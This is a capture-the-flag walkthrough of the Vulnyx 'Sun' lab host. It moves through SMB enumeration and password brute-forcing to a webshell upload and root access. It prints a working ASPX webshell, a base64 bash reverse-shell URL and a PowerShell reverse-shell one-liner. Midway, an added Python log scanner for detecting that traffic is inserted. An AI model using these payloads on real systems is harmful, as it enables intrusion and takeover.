Hack Enumerate Harder!. Eat. Sleep. Repeat.

First enumeration with nmap

# Nmap 7.94SVN scan initiated Sun Apr 14 08:46:48 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 22,80,139,445,8080 -Pn 172.16.246.131
Nmap scan report for 172.16.246.131
Host is up (0.00074s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http        nginx 1.22.1
|_http-title: Sun
|_http-server-header: nginx/1.22.1
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
8080/tcp open  http        nginx 1.22.1
|_http-title: Sun
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SUN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -2s
| smb2-time: 
|   date: 2024-04-14T07:47:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 14 08:47:13 2024 -- 1 IP address (1 host up) scanned in 25.22 seconds

Enumerating SMB

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/Vulnyx/Sun]
└─$ smbclient -L 172.16.246.131 -N 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.16.246.131 (for a protocol between NT1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Checking for anonymous shares available to us, we can see the nobody share.

Found a username: punt4n0.

Tried to brute-force the password for the user.

Found the password: sunday.

Using the credentials we obtained, we checked which SMB shares we have access to; we got read/write access to one of the shares.

Logged in to download some files and uploaded a file into the share.

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>

<script runat="server">

protected void Page_Load(object sender, EventArgs e)
{
    string cmd = Request["cmd"];
    
    if (!string.IsNullOrEmpty(cmd))
    {
        ExecuteCommand(cmd);
    }
}

private void ExecuteCommand(string command)
{
    try
    {
        Process proc = new Process();
        proc.StartInfo.FileName = "/bin/bash";
        proc.StartInfo.Arguments = "-c \"" + command + "\"";
        proc.StartInfo.RedirectStandardOutput = true;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.CreateNoWindow = true;
        proc.Start();
        
        string output = proc.StandardOutput.ReadToEnd();
        Response.Write(output);
        proc.WaitForExit();
    }
    catch (Exception ex)
    {
        Response.Write("Error: " + ex.Message);
    }
}

</script>

Uploading an ASPX webshell obtained from a friend.

Uploaded it.

Navigating to the shell path http://172.16.246.131:8080/pwned.aspx?cmd=id, we triggered RCE.

http://172.16.246.131:8080/pwned.aspx?cmd=echo%20%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNi4yNDYuMS84MCAwPiYx%22%20|%20base64%20-d%20|%20bash

Using the payload above, we spawned a reverse shell.
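As an added defender-side example (my code, not part of the original writeup), this Python scans nginx access-log lines for the traffic pattern shown above: a cmd parameter sent to an .aspx handler, a base64-decode piped into a shell, and a decoded payload that opens a /dev/tcp socket. The log lines are constructed (the third mirrors the request path from the writeup); the log format, path and field names are assumptions.

```python
import base64
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit
# Constructed nginx access-log lines (not from the original post); the third
# line mirrors the request path used in the writeup, the first two are plain.
SAMPLE_LOG = """\
172.16.246.1 - - [14/Apr/2024:08:50:01 +0100] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
172.16.246.1 - - [14/Apr/2024:08:52:40 +0100] "GET /pwned.aspx?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
172.16.246.1 - - [14/Apr/2024:08:55:02 +0100] "GET /pwned.aspx?cmd=echo%20%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNi4yNDYuMS84MCAwPiYx%22%20|%20base64%20-d%20|%20bash HTTP/1.1" 200 0 "-" "curl/8.5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")                             # candidate base64 blobs
SHELL_PIPE_RE = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")   # decode piped into a shell

@dataclass
class Finding:
    ip: str
    path: str
    indicators: list[str] = field(default_factory=list)
    decoded: str = ""   # printable text recovered from an inline base64 blob, if any

def analyse_request(target: str) -> tuple[list[str], str]:
    # Returns (indicators, decoded payload) for one request-line target.
    parts = urlsplit(target)
    params = parse_qs(parts.query)       # values come back URL-decoded
    indicators, decoded = [], ""
    if not parts.path.lower().endswith(".aspx") or "cmd" not in params:
        return indicators, decoded
    indicators.append("cmd parameter on .aspx handler")
    cmd = params["cmd"][0]
    if SHELL_PIPE_RE.search(cmd):
        indicators.append("base64 decoded into a shell")
    for blob in B64_RE.findall(cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue                     # not real base64, or binary: skip it
        if text.isprintable():
            decoded = text
            if "/dev/tcp/" in text:
                indicators.append("decoded payload opens a /dev/tcp socket")
    return indicators, decoded

def scan_log(log_text: str) -> list[Finding]:
    # Keeps only the log lines that look like webshell use.
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (result := analyse_request(m["target"]))[0]:
            findings.append(Finding(m["ip"], urlsplit(m["target"]).path, *result))
    return findings
```

Pointing scan_log at a real access log (nginx default combined format) surfaces both the plain cmd=id probe and the encoded stage, which a signature on the raw URL alone would miss.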

Privilege Escalation

Running pspy, we can see a PowerShell script running as root.

$LHOST = "172.16.246.1"; $LPORT = 80; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

Modified the service.ps1 script and waited for 1 min.

Got a reverse shell as root.

And we are through!!!